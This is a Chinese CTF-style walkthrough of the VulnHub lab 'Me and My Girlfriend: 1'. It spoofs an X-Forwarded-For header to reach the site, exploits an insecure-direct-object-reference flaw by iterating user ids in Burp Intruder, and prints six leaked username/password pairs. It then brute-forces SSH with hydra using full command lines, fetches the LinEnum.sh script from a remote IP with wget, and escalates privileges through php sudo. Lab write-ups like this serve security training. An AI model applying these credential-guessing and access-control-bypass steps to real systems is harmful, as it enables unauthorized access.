靶机下载地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
靶机ip:192.168.70.158
kali ip:192.168.70.129

一、信息搜集

因为kali扫不到ip,将靶机的网络连接方式改为NAT模式

进行端口和服务扫描

发现开启80端口和22duank,进行80端口的访问

查看页面源码,发现有提示信息

这个请求必须来自本地访问,这里我的火狐没有安装插件,所以使用burpsuit来添加头部信息,
x-forwarded-for:127.0.0.1

发现登录和注册页面

二、越权漏洞

进行注册,然后登陆

发现url存在id值,再注册一个用户,查看新的url是否变化

发现id变为13
可能会存在越权漏洞,进行id变化,并进入profile页面,发现个人账号泄露 ,burpsuit的配置如下

通过长度得知那个id是可以利用的。

将这几个人的账号和密码收集一下
可以查看intruder模块下的response模块

1.eweuhtandingan skuyatuh
2.aingmaung qwerty!!!
3.sedihaingmah cedihhihihi
4.sundatea indONEsia
5.alice 4lic3
6.abdikasepak dorrrrr

三、ssh连接

现在密码收集完成了,进行ssh连接吧
附上几个hydra官方给的例子

因为开放了22端口,所以我们进行的是hh连接,将账号和密码分开放在两个文本当中,在进行hydra进行爆破,使用的命令是:

hydra -L /home/ycx/Desktop/zhanghao -P /home/ycx/Desktop/mima.txt
ssh://192.168.70.158

hydra -l root -w 10 -P pwd.txt -t 10 -v -f 192.168.1.20 ssh
-l root 指定爆破账号为root
-w 10 指定每个线程的回应时间为10S
-P pwd.txt 指定密码字典为pwd.txt
-t 10 指定爆破线程为10个
-v 指定显示爆破过程
-f 查找到第一个可以使用的ID和密码的时候停止破解

结果如下

进行ssh连接

至此看到flag1

四、提权

可以使用wget下载扫描脚本,接着赋予权限,也可以使用进行扫描(比较靠谱)
Wget http://59.110.237.157/ycx/LinEnum.sh (我自己的云服务器,有效期还有20天……)
也可以使用python,进行传输文件,开启命令:pythom -m http.server 8000

[sudo -l]列出目前的权限。

分享一篇php提权知识:(10条消息) PHP提权姿势_她叫常玉莹的博客-CSDN博客_php提权


输入以上命令进行提权,提权结果如下

获取最终flag

五、知识点总结:

  • 靶机ip发现
  • 靶机端口扫描
  • 越权漏洞发现
  • burpsuit自动匹配添加x-forwarded-for信息,进行id爆破
  • hydra进行爆破ssh
  • 利用脚本扫描Linux,进行php sudo提权

vulnhub靶机ME AND MY GIRLFRIEND: 1相关推荐

  1. Vulnhub靶机渗透之Me and My Girlfriend

    本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描 ...

  2. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  3. Vulnhub靶机系列:SecTalks: BNE0x03 - Simple

    这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...

  4. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  5. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  6. Vulnhub靶机DC系列-DC-8

    Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...

  7. Vulnhub靶机:EVILBOX_ ONE(很详细)

    目录 介绍 信息收集 主机发现 主机信息探测 网站探测 目录扫描 目录扫描字典 爆破页面参数 Burpsuite爆破参数 ffuf 补充:区分文件包含与文件读取 文件包含漏洞 文件包含.任意文件读取的 ...

  8. Vulnhub靶机渗透学习——DC-9

    本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub靶机 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试.提权. ...

  9. Vulnhub靶机Wakanda渗透测试攻略

    前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...

最新文章

  1. 转载非原创:修改BB 的内容,回车后修改CC 的值
  2. 物联网安全的后备计划是什么?
  3. 成都铁路警方联合多部门开展反恐防暴演练
  4. [导入]VB实现SQL Server数据库备份/恢复
  5. C++ 静态线性表的顺序存储结构(数组实现)
  6. mysql count里面能加条件吗_select count(1) 和 count(*),哪个性能更好?
  7. access vba 用recordset读取表中数据的简单方法
  8. linux变量存储命令,如何将命令存储在shell脚本中的变量中?
  9. selenium中Chrome和Firefox浏览器驱动的使用和版本对应
  10. c语言的详细编译过程
  11. 【重点】剑指offer——面试题53:正则表达式匹配
  12. 小程序 Vant Weapp 使用插槽自定义 Cell 的左侧图标
  13. Proxmark3初学:用PM3克隆M1普通门禁卡方法
  14. 12306抢票工具的使用
  15. 科研狗citavi/mendeley+word使用技巧外加读论文瞎琢磨
  16. SQL Server中字段、记录、表、列、行、属性、元组、主键、外键的含义
  17. 风速 电池测试软件,QDF-6型智能热球风速计操作规程
  18. 如何搭建“网络课堂”
  19. 亲民地理-第45期-西雅图城市大学
  20. As rich as Crassus(扩展中国剩余定理)

热门文章

  1. 流行20年的架构设计原则SOLID可能已经不适合微服务了
  2. 2022-2027年中国钛加工材行业市场全景评估及发展战略规划报告
  3. 区块链技术的风险!(转载)
  4. 伴着代码,那个女孩儿慢慢长大
  5. 迭代、原型、螺旋、敏捷模型之间的区别
  6. Julia中的numerator()函数
  7. switch函数不加break的效果
  8. 并查集+思维——Destroying Array
  9. 单核CPU和多核CPU的理解
  10. 转载总结总结一些常用的页面小技巧